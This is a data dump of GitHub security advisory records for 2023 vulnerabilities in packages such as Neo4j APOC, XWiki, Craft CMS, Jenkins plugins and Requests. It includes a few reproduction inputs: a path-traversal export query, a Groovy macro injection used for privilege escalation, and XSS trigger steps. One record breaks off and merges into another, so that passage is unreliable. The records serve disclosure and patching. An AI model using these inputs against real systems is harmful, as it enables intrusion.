'https://nvd.nist.gov/vuln/detail/CVE-2023-22742'}, {'type': 'WEB', 'url': 'https://github.com/rust-lang/git2-rs/commit/87934f87d36753ed702792ec063be7246444a8e1'}, {'type': 'PACKAGE', 'url': 'https://github.com/rust-lang/git2-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0003.html'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-20T23:36:41Z', 'nvd_published_at': None}" 1.4.0,GHSA-6rrr-78xp-5jp8,2023-01-24T18:55:45Z,2023-01-11T18:27:48Z,,['CVE-2023-22492'],Zitadel RefreshToken invalidation vulnerability,"### Impact RefreshTokens is an OAuth 2.0 feature that allows applications to retrieve new access tokens and refresh the user's session without the need for interacting with a UI. RefreshTokens were not invalidated when a user was locked or deactivated. The deactivated or locked user was able to obtain a valid access token only through a refresh token grant. When the locked or deactivated user’s session was already terminated (“logged out”) then it was not possible to create a new session. Renewal of access token through a refresh token grant is limited to the configured amount of time (RefreshTokenExpiration). ### Patches 2.x versions are fixed on >= [2.17.3](https://github.com/zitadel/zitadel/releases/tag/v2.17.3) 2.16.x versions are fixed on >= [2.16.4](https://github.com/zitadel/zitadel/releases/tag/v2.16.4) ZITADEL recommends upgrading to the latest versions available in due course. ### Workarounds Ensure the RefreshTokenExpiration in the OIDC settings of your instance is set according to your security requirements. ### References https://zitadel.com/docs/guides/manage/console/instance-settings#oidc-token-lifetimes-and-expiration ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/zitadel/zitadel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.17.0'}, {'fixed': '2.17.3'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/zitadel/zitadel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.16.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/zitadel/zitadel/security/advisories/GHSA-6rrr-78xp-5jp8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22492'}, {'type': 'WEB', 'url': 'https://github.com/zitadel/zitadel/commit/301e22c4956ead6014a8179463c37263f7301a83'}, {'type': 'WEB', 'url': 'https://github.com/zitadel/zitadel/commit/fc892c52a10cd4ffdac395747494f3a93a7494c2'}, {'type': 'PACKAGE', 'url': 'https://github.com/zitadel/zitadel'}, {'type': 'WEB', 'url': 'https://github.com/zitadel/zitadel/releases/tag/v2.16.4'}, {'type': 'WEB', 'url': 'https://github.com/zitadel/zitadel/releases/tag/v2.17.3'}]","{'cwe_ids': ['CWE-613'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-11T18:27:48Z', 'nvd_published_at': '2023-01-11T20:15:00Z'}" 1.4.0,GHSA-5v8v-gwmw-qw97,2023-01-24T18:06:35Z,2023-01-13T21:28:46Z,,['CVE-2022-23532'],org.neo4j.procedure:apoc Path Traversal Vulnerability,"### Impact A Path Traversal Vulnerability found in the apoc.export.* procedures of apoc plugins in Neo4j Graph database. The issue allows a malicious actor to potentially break out of the expected directory. The vulnerability is such that files could only be created but not overwritten. For the vulnerability to be exploited, an attacker would need access to execute an arbitrary query, either by having access to an authenticated Neo4j client, or a Cypher injection vulnerability in an application. The procedure would need to have been allow listed in the neo4j configuration as well as having the apoc config `apoc.export.file.enabled` set to true. On a UNIX based system the following query allows arbitrary write access to the tmp folder: CALL apoc.export.csv.query('RETURN 1', 'file:///..//..//..//..//tmp/test.txt', {}) ### Patches The users should aim to use the latest released version compatible with their Neo4j version. The minimum versions containing patch for this vulnerability are 4.4.0.12 and 4.3.0.12. ### Workarounds If you cannot upgrade the library, you can control the [allowlist of the ](https://neo4j.com/docs/operations-manual/current/reference/configuration-settings/#config_dbms.security.procedures.allowlist)procedures that can be used in your system, and/or turn off local file access by setting apoc.export.file.enabled=false ### For more information If you have any questions or comments about this advisory: * Open an issue in [neo4j-apoc-procedures](https://github.com/neo4j-contrib/neo4j-apoc-procedures) * Email us at [security@neo4j.com](mailto:security@neo4j.com) ### Credits We want to publicly recognise the contribution Adam Reziouk - Airbus.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:L'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.neo4j.procedure:apoc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.3.0.12'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.neo4j.procedure:apoc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.4.0.0'}, {'fixed': '4.4.0.12'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/neo4j-contrib/neo4j-apoc-procedures/security/advisories/GHSA-5v8v-gwmw-qw97'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-23532'}, {'type': 'WEB', 'url': 'https://github.com/neo4j-contrib/neo4j-apoc-procedures/commit/01e63ed2d187cd2a8aa1d78bf831ef0fdd69b522'}, {'type': 'PACKAGE', 'url': 'https://github.com/neo4j-contrib/neo4j-apoc-procedures'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-13T21:28:46Z', 'nvd_published_at': '2023-01-14T01:15:00Z'}" 1.4.0,GHSA-7vcx-v65q-9wpg,2023-01-11T23:53:34Z,2023-01-11T23:53:34Z,,[],XML-RPC for PHP's `Wrapper::buildClientWrapperCode` method allows code injection via malicious `$client` argument,"In order for this weakness to be exploited, the following conditions have to apply, at the same time: - method `Wrapper::buildClientWrapperCode`, or any methods which depend on it, such as `Wrapper::wrapXmlrpcServer`, `Wrapper::wrapXmlrpcMethod` or `Wrapper::buildWrapMethodSource` must be in use. Note that they are _not_ used by default in either the Client or Server classes provided by the library; the developer has to specifically make use of them in his/her own code - the `$client` argument to either of those methods should have been built with malicious data, ie. data controlled by a 3rd party, passed to its constructor call This is most likely an uncommon usage scenario, and as such the chances of exploitation may be low. *NB* the graphical debugger which is shipped as part of the library is vulnerable to this, when used with the option ""Generate stub for method call"" selected. In that case, the debugger will _display_ but not _execute_ the malicious code, which would have to be provided via carefully crafted values for the ""Address"" and ""Path"" inputs. The attack scenario in this case is that a developer copies into his/her own source code the php snippet generated by the debugger, in a situation where the debugger is used with ""Address""/""Path"" input values supplied by a 3rd party. The malicious payload in the ""Address""/""Path"" input values should be easily recognized as suspicious by any barely proficient developer, as it resembles a bog-standard injection attack. It goes without saying that a responsible developer should not blindly copy and paste into his/her own code anything generated by a 3rd party tool, such as the phpxmlrpc debugger, without giving it at least a cursory scan. Originally reported as issue #80",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'phpxmlrpc/phpxmlrpc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.9.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/gggeek/phpxmlrpc/security/advisories/GHSA-7vcx-v65q-9wpg'}, {'type': 'WEB', 'url': 'https://github.com/gggeek/phpxmlrpc/issues/80'}, {'type': 'WEB', 'url': 'https://github.com/gggeek/phpxmlrpc/commit/cf6e605e09d001ce520bfa8e7b168cfa514e663b'}, {'type': 'PACKAGE', 'url': 'https://github.com/gggeek/phpxmlrpc'}]","{'cwe_ids': ['CWE-94'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-11T23:53:34Z', 'nvd_published_at': None}" 1.4.0,GHSA-h857-2g56-468g,2023-01-05T12:18:35Z,2023-01-05T12:18:35Z,,['CVE-2023-22461'],@mattkrick/sanitize-svg vulnerable to Cross-Site Scripting (XSS),"### Impact The *sanitize-svg* package uses a deny-list-pattern to sanitize SVGs to prevent cross-site scripting (XSS). In doing so, literal ` 4. Click Utilities tab 5. Choose all volumes, or volume trigger xss 7. Click Update asset indexes. XSS will be triggered Json response volumes name makes triggers the payload ""session"":{""id"":1,""indexedVolumes"":{""1"":""\""""}, It’s run on every POST request in the utility. Resolved in https://github.com/craftcms/cms/commit/8c2ad0bd313015b8ee42326af2848ee748f1d766 ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'craftcms/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0-RC1'}, {'fixed': '4.4.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.4.5'}}]","[{'type': 'WEB', 'url': 'https://github.com/craftcms/cms/security/advisories/GHSA-6qjx-787v-6pxr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33197'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/commit/8c2ad0bd313015b8ee42326af2848ee748f1d766'}, {'type': 'PACKAGE', 'url': 'https://github.com/craftcms/cms'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/releases/tag/4.4.6'}]","{'cwe_ids': ['CWE-79', 'CWE-80'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-26T13:56:26Z', 'nvd_published_at': None}" 1.4.0,GHSA-36fm-j33w-c25f,2023-05-11T20:36:59Z,2023-05-11T20:36:59Z,,['CVE-2023-32069'],Privilege escalation (PR)/RCE from account through class sheet,"### Impact It's possible for a user to execute anything with the right of the author of the XWiki.ClassSheet document. **Steps to Reproduce:** 1. Edit your user profile with the object editor and add an object of type `DocumentSheetBinding` with value `Default Class Sheet` 1. Edit your user profile with the wiki editor and add the syntax `{{async}}{{groovy}}println(""Hello "" + ""from groovy!""){{/groovy}}{{/async}}` 1. Click ""Save & View"" **Expected result:** An error is displayed as the user doesn't have the right to execute the Groovy macro. **Actual result:** The text ""Hello from groovy!"" is displayed at the top of the document. ### Patches This has been patched in XWiki 15.0-rc-1 and 14.10.4. ### Workarounds There are no known workarounds for it. ### References https://jira.xwiki.org/browse/XWIKI-20566 https://github.com/xwiki/xwiki-platform/commit/de72760d4a3e1e9be64a10660a0c19e9534e2ec4 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki.org](https://jira.xwiki.org/) * Email us at [Security Mailing List](mailto:security@xwiki.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-test-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.3-milestone-3'}, {'fixed': '14.10.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-36fm-j33w-c25f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32069'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/de72760d4a3e1e9be64a10660a0c19e9534e2ec4'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20566'}]","{'cwe_ids': ['CWE-863'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-05-11T20:36:59Z', 'nvd_published_at': None}" 1.4.0,GHSA-xxq2-74hw-vg6m,2023-05-17T03:46:29Z,2023-05-16T18:30:16Z,,['CVE-2023-33005'],Jenkins WSO2 Oauth Plugin Session Fixation vulnerability,"Jenkins WSO2 Oauth Plugin 1.0 and earlier does not invalidate the existing session on login. This allows attackers to use social engineering techniques to gain administrator access to Jenkins. As of publication of this advisory, there is no fix.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:wso2id-oauth'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33005'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-2991'}]","{'cwe_ids': ['CWE-384', 'CWE-613'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T03:46:29Z', 'nvd_published_at': None}" 1.4.0,GHSA-p74v-mwvg-8ghp,2023-06-07T13:51:44Z,2023-05-31T15:30:18Z,,['CVE-2023-33736'],Dcat-Admin vulnerable to Stored Cross-site Scripting,A stored cross-site scripting (XSS) vulnerability in Dcat-Admin v2.1.3-beta allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the URL parameter.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'dcat/laravel-admin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.1.3-beta'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33736'}, {'type': 'WEB', 'url': 'https://github.com/jqhph/dcat-admin/issues/2027'}, {'type': 'PACKAGE', 'url': 'https://github.com/jqhph/dcat-admin'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T01:57:37Z', 'nvd_published_at': None}" 1.4.0,GHSA-j657-pjgc-c4h6,2023-05-24T17:09:15Z,2023-05-17T09:30:16Z,,['CVE-2023-2752'],phpMyFAQ vulnerable to stored Cross-site Scripting,Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.2.0-beta.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.0-beta'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2752'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/e7599d49b0ece7ceef3a4e8d334782cc3df98be8'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpmyfaq'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/efdf5b24-6d30-4d57-a5b0-13b253ba3ea4'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T17:05:01Z', 'nvd_published_at': None}" 1.4.0,GHSA-mj6p-3pc9-wf5m,2023-06-06T01:52:50Z,2023-05-30T18:30:23Z,,['CVE-2023-2968'],proxy denial of service vulnerability,"A remote attacker can trigger a denial of service in the `socket.remoteAddress` variable, by sending a crafted HTTP request. Usage of the undefined variable raises a TypeError exception. ",[],"[{'package': {'ecosystem': 'npm', 'name': 'proxy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2968'}, {'type': 'WEB', 'url': 'https://github.com/TooTallNate/proxy-agents/pull/178'}, {'type': 'WEB', 'url': 'https://github.com/TooTallNate/proxy-agents/commit/25e0c931390eb8f41c5ceaca72820de9198ece39'}, {'type': 'PACKAGE', 'url': 'https://github.com/TooTallNate/proxy-agents'}, {'type': 'WEB', 'url': 'https://research.jfrog.com/vulnerabilities/undefined-variable-usage-in-proxy-leads-to-remote-denial-of-service-xray-520917'}]","{'cwe_ids': ['CWE-232'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T01:52:50Z', 'nvd_published_at': None}" 1.4.0,GHSA-95x4-j7vc-h8mf,2023-05-17T17:07:57Z,2023-05-17T17:07:57Z,,['CVE-2023-26044'],ReactPHP's HTTP server continues parsing unused multipart parts after reaching input field and file upload limits,"### Summary Previous versions of ReactPHP's HTTP server component contain a potential DoS vulnerability that can cause high CPU load when processing large HTTP request bodies. This vulnerability has little to no impact on the default configuration, but can be exploited when explicitly using the `RequestBodyBufferMiddleware` with very large settings. This might lead to consuming large amounts of CPU time for processing requests and significantly delay or slow down the processing of legitimate user requests. ### Patches The supplied patch resolves this vulnerability for ReactPHP. ### Workarounds - Keeping the request body limit using `RequestBodyBufferMiddleware` sensible will mitigate it. - Infrastructure or DevOps can place a reverse proxy in front of the ReactPHP HTTP server to filter out any excessive HTTP request bodies. ### References A similar vulnerability was discovered in PHP recently, see also [PHP's security advisory](https://github.com/php/php-src/security/advisories/GHSA-54hq-v5wp-fqgv) (CVE-2023-0662). The fix is based on the [PHP-FPM fix](https://github.com/php/php-src/commit/716de0cff539f46294ef70fe75d548cd66766370#diff-81d659aa9e83177ac08151f99cebf21ab331d22462c72a1039f59947e66f5a35). ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'react/http'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.8.0'}, {'fixed': '1.9.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/php/php-src/security/advisories/GHSA-54hq-v5wp-fqgv'}, {'type': 'WEB', 'url': 'https://github.com/reactphp/http/security/advisories/GHSA-95x4-j7vc-h8mf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26044'}, {'type': 'WEB', 'url': 'https://github.com/php/php-src/commit/716de0cff539f46294ef70fe75d548cd66766370#diff-81d659aa9e83177ac08151f99cebf21ab331d22462c72a1039f59947e66f5a35'}, {'type': 'WEB', 'url': 'https://github.com/reactphp/http/commit/9681f764b80c45ebfb5fe2ea7da5bd3babfcdcfd'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/react/http/CVE-2023-26044.yaml'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-95x4-j7vc-h8mf'}, {'type': 'PACKAGE', 'url': 'https://github.com/reactphp/http'}, {'type': 'WEB', 'url': 'https://github.com/reactphp/http/releases/tag/v1.9.0'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T17:07:57Z', 'nvd_published_at': None}" 1.4.0,GHSA-x487-866m-p8hr,2023-06-03T00:02:26Z,2023-05-26T15:30:21Z,,['CVE-2023-30145'],Server-Side Template Injection in Camaleon CMS,Camaleon CMS prior to 2.7.4 was discovered to contain a Server-Side Template Injection (SSTI) vulnerability via the `formats` parameter.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'camaleon_cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.7.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30145'}, {'type': 'WEB', 'url': 'https://github.com/owen2345/camaleon-cms/issues/1052'}, {'type': 'WEB', 'url': 'https://github.com/owen2345/camaleon-cms/commit/4485788c544eb1aae52ca613bd9626129e3df6ee'}, {'type': 'WEB', 'url': 'https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection'}, {'type': 'WEB', 'url': 'https://drive.google.com/file/d/11MsSYqUnDRFjcwbQKJeL9Q8nWpgVYf2r/view?usp=share_link'}, {'type': 'PACKAGE', 'url': 'https://github.com/owen2345/camaleon-cms'}, {'type': 'WEB', 'url': 'https://github.com/owen2345/camaleon-cms/releases/tag/2.7.4'}, {'type': 'WEB', 'url': 'https://github.com/paragbagul111/CVE-2023-30145'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/camaleon_cms/CVE-2023-30145.yml'}, {'type': 'WEB', 'url': 'https://portswigger.net/research/server-side-template-injection'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/172593/Camaleon-CMS-2.7.0-Server-Side-Template-Injection.html'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-05-26T19:44:38Z', 'nvd_published_at': None}" 1.4.0,GHSA-c9qp-6556-jwwp,2023-05-17T02:56:57Z,2023-05-16T18:30:16Z,,['CVE-2023-32978'],Jenkins LDAP Plugin vulnerable to Cross-Site Request Forgery,"Jenkins LDAP Plugin 673.v034ec70ec2b_b_ and earlier does not require POST requests for a form validation method, resulting in a cross-site request forgery (CSRF) vulnerability. This vulnerability allows attackers to connect to an attacker-specified LDAP server using attacker-specified credentials. LDAP Plugin 676.vfa_64cf6b_b_002 requires POST requests for the affected form validation method.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:ldap'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '676.vfa'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32978'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-3046'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T02:56:57Z', 'nvd_published_at': None}" 1.4.0,GHSA-vjr2-wpfh-5r9p,2023-05-11T20:56:09Z,2023-05-05T09:30:15Z,,['CVE-2021-40331'],Apache Ranger Hive Plugin missing permissions check,"An Incorrect Permission Assignment for Critical Resource vulnerability was found in the Apache Ranger Hive Plugin. Any user with SELECT privilege on a database can alter the ownership of the table in Hive when Apache Ranger Hive Plugin is enabled This issue affects Apache Ranger Hive Plugin: from 2.0.0 through 2.3.0. Users are recommended to upgrade to version 2.4.0 or later. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.ranger:ranger-hive-plugin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-40331'}, {'type': 'WEB', 'url': 'https://github.com/apache/ranger/commit/7dec3015ec82b69ba8f724410f12dfce2480cccd'}, {'type': 'WEB', 'url': 'https://github.com/apache/ranger/commit/9115a20d524ba9173ce5db3e270c385d58d8aeab'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/ranger'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/RANGER-3357'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/RANGER-3474'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/s68yls6cnkdmzn1k4hqt50vs6wjvt2rn'}]","{'cwe_ids': ['CWE-732'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-05T22:53:57Z', 'nvd_published_at': None}" 1.4.0,GHSA-gpc2-f62m-c6h6,2023-05-17T03:40:21Z,2023-05-16T18:30:16Z,,['CVE-2023-2632'],Jenkins Code Dx Plugin stores API keys in plain text,"Jenkins Code Dx Plugin 3.1.0 and earlier stores Code Dx server API keys unencrypted in job `config.xml` files on the Jenkins controller as part of its configuration. These API keys can be viewed by users with Item/Extended Read permission or access to the Jenkins controller file system. Additionally, the job configuration form does not mask these API keys, increasing the potential for attackers to observe and capture them. Code Dx Plugin 4.0.0 no longer stores the API keys directly, instead accessing them through its newly added Credentials Plugin integration. Affected jobs need to be reconfigured.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:codedx'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2632'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-3146'}]","{'cwe_ids': ['CWE-256', 'CWE-522'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T03:40:21Z', 'nvd_published_at': None}" 1.4.0,GHSA-h5g9-2p35-54c7,2023-06-07T13:52:38Z,2023-05-31T15:30:18Z,,['CVE-2023-3009'],nilsteampassnet/teampass vulnerable to cross-site scripting ,"Cross-site Scripting (XSS) - Stored in GitHub repository nilsteampassnet/teampass prior to 3.0.9. This enables an attacker to inject malicious code into a shared folder, which can then be executed by other users who have access to the folder. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'nilsteampassnet/teampass'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3009'}, {'type': 'WEB', 'url': 'https://github.com/nilsteampassnet/teampass/commit/6ba8cf1f4b89d62a08d122d533ccf4cb4e26a4ee'}, {'type': 'PACKAGE', 'url': 'https://github.com/nilsteampassnet/TeamPass'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/2929faca-5822-4636-8f04-ca5e0001361f'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-01T19:11:20Z', 'nvd_published_at': None}" 1.4.0,GHSA-9prm-jqwx-45x9,2023-05-31T23:39:15Z,2023-05-31T23:39:15Z,,['CVE-2023-32689'],Phishing attack vulnerability by uploading malicious HTML file,"### Impact Phishing attack vulnerability by uploading malicious files. A malicious user could upload a HTML file to Parse Server via its public API. That HTML file would then be accessible at the internet domain at which Parse Server is hosted. The URL of the the uploaded HTML could be shared for phishing attacks. The HTML page may seem legitimate because it is served under the internet domain where Parse Server is hosted, which may be the same as a company's official website domain. An additional security issue arises when the Parse JavaScript SDK is used. The SDK stores sessions in the internet browser's local storage, which usually restricts data access depending on the internet domain. A malicious HTML file could contain a script that retrieves the user's session token from local storage and then share it with the attacker. ### Patches The fix adds a new Parse Server option `fileUpload.fileExtensions` to restrict file upload on Parse Server by file extension. It is recommended to restrict file upload for HTML file extensions, which this fix disables by default. If an app requires upload of files with HTML file extensions, the option can be set to `['.*']` or another custom value to override the default. ### References - https://github.com/parse-community/parse-server/security/advisories/GHSA-9prm-jqwx-45x9 - https://github.com/parse-community/parse-server/pull/8538 (Parse Server 6) - https://github.com/parse-community/parse-server/pull/8537 (Parse Server 5) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'parse-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.4.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'parse-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/security/advisories/GHSA-9prm-jqwx-45x9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32689'}, {'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/pull/8537'}, {'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/pull/8538'}, {'type': 'PACKAGE', 'url': 'https://github.com/parse-community/parse-server'}]","{'cwe_ids': ['CWE-434'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-31T23:39:15Z', 'nvd_published_at': None}" 1.4.0,GHSA-j8r2-6x86-q33q,2023-09-20T19:19:30Z,2023-05-22T20:36:32Z,,['CVE-2023-32681'],Unintended leak of Proxy-Authorization header in requests,"### Impact Since Requests v2.3.0, Requests has been vulnerable to potentially leaking `Proxy-Authorization` headers to destination servers, specifically during redirects to an HTTPS origin. This is a product of how `rebuild_proxies` is used to recompute and [reattach the `Proxy-Authorization` header](https://github.com/psf/requests/blob/f2629e9e3c7ce3c3c8c025bcd8db551101cbc773/requests/sessions.py#L319-L328) to requests when redirected. Note this behavior has _only_ been observed to affect proxied requests when credentials are supplied in the URL user information component (e.g. `https://username:password@proxy:8080`). **Current vulnerable behavior(s):** 1. HTTP → HTTPS: **leak** 2. HTTPS → HTTP: **no leak** 3. HTTPS → HTTPS: **leak** 4. HTTP → HTTP: **no leak** For HTTP connections sent through the proxy, the proxy will identify the header in the request itself and remove it prior to forwarding to the destination server. However when sent over HTTPS, the `Proxy-Authorization` header must be sent in the CONNECT request as the proxy has no visibility into further tunneled requests. This results in Requests forwarding the header to the destination server unintentionally, allowing a malicious actor to potentially exfiltrate those credentials. The reason this currently works for HTTPS connections in 